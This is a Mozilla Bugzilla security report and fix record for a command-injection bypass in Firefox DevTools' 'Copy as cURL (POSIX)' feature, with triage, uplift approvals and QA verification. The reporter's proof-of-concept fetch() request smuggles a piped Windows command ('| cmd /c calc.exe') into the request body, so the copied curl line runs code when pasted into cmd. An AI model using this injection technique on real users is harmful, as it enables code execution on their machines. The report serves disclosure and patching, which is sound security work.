Copy As Curl (Posix) - Code Execution - bug 1949994 bypass
Categories
(DevTools :: Netmonitor, defect)
Tracking
(firefox-esr115138+ verified, firefox-esr128138+ verified, firefox137 wontfix, firefox138+ verified, firefox139+ verified)
People
(Reporter: ameenbasha111, Assigned: bomsy)
References
Details
(Keywords: csectype-priv-escalation, reporter-external, sec-moderate, Whiteboard: [client-bounty-form][adv-main138+][adv-esr115.23+][adv-esr128.10+])
Attachments
(3 files)
|
3.37 MB,
video/mp4
|
Details | |
|
48 bytes,
text/x-phabricator-request
|
diannaS
:
approval-mozilla-beta+
diannaS
:
approval-mozilla-esr115+
diannaS
:
approval-mozilla-esr128+
|
Details | Review |
|
300 bytes,
text/plain
|
Details |
Hi Team, while retesting my another fixed issue (Ref added below), i have found a way to bypass the fix and get my code executed on victim machine
Ref: https://bugzilla.mozilla.org/show_bug.cgi?id=1949994
Root Cause: & and | both allows cmd to execute multiple commands seems only & is handled in above ticket. Using | i can still execute code
Payload
fetch("/", {
credentials: "omit",
headers: {
"Accept-Language": "en-US",
"Content-Type": "text/plain",
},
body: "query=evil\n\n | cmd /c calc.exe \n\n",
method: "POST",
});
Steps to reproduce
- Paste the above code in console (or) include it in a html file to auto send the request
- Copy the request as curl (posix) feature
- Paste it on cmd and you can see calc pops up
Tested it on latest firefox nightly (on which #1949994 is fixed)
I have attached the poc video for reference
|
Reporter | |
Comment 1•1 year ago
|
||
|
||
Updated•1 year ago
|
|
Assignee | |
Comment 2•1 year ago
|
||
|
||
Updated•1 year ago
|
|
||
Comment 3•1 year ago
|
||
It would be best to fix this in 138 and release with the fix for bug 1949994.
|
||
Comment 5•1 year ago
|
||
|
||
Comment 6•1 year ago
|
||
The patch landed in nightly and beta is affected.
:bomsy, is this bug important enough to require an uplift?
- If yes, please nominate the patch for beta approval.
- See https://wiki.mozilla.org/Release_Management/Requesting_an_Uplift for documentation on how to request an uplift.
- If no, please set
status-firefox138towontfix.
For more information, please visit BugBot documentation.
|
|
Assignee | |
Comment 7•1 year ago
|
||
Comment on attachment 9479102 [details]
Bug 1960198 - [devtools] Escape the vertical bar character r=#devtools
Beta/Release Uplift Approval Request
- User impact if declined/Reason for urgency: Malicious code can be executed on the the users machine
- Is this code covered by automated tests?: Yes
- Has the fix been verified in Nightly?: Yes
- Needs manual test from QE?: Yes
- If yes, steps to reproduce:
- List of other uplifts needed: None
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Small js code to escape the curl command
- String changes made/needed:
- Is Android affected?: No
|
|
Assignee | |
Comment 8•1 year ago
|
||
Comment on attachment 9479102 [details]
Bug 1960198 - [devtools] Escape the vertical bar character r=#devtools
ESR Uplift Approval Request
- If this is not a sec:{high,crit} bug, please state case for ESR consideration: This is a Security Bug
- User impact if declined:
- Fix Landed on Version:
- Risk to taking this patch: Low
- Why is the change risky/not risky? (and alternatives if risky): Small js fix to escape the curl command
|
|
||
Updated•1 year ago
|
|
||
Comment 10•1 year ago
•
|
||
Comment on attachment 9479102 [details]
Bug 1960198 - [devtools] Escape the vertical bar character r=#devtools
Approved for 138.0b9
Approved for 115.23esr
Approved for 128.10esr
|
|
||
Updated•1 year ago
|
|
||
Comment 11•1 year ago
|
||
| uplift | ||
|
|
||
Updated•1 year ago
|
|
|
||
Comment 12•1 year ago
|
||
| uplift | ||
|
|
||
Updated•1 year ago
|
|
||
Updated•1 year ago
|
|
||
Updated•1 year ago
|
I have reproduced the issue by following the steps from comment 0 on Windows 10x64 with Firefox 138.0b7 and on Windows 7x64 with Firefox 115.22.esr. After executing the copied curl (posix) inside CMD, the Calculator application was opened.
The issue is verified fixed on Windows 10 with Firefox 139.0a1 (2025-04-22), 138.0, 128.10.0esr and on Windows 7x64 with 115.23esr . The Calculator application is no longer opened after following steps from comment 0 and executing the copied curl (posix) inside CMD.
|
||
Updated•1 year ago
|
|
|
||
Updated•1 year ago
|
|
|
||
Updated•1 year ago
|
|
|
||
Comment 14•1 year ago
|
||
|
|
||
Updated•8 months ago
|
Description
•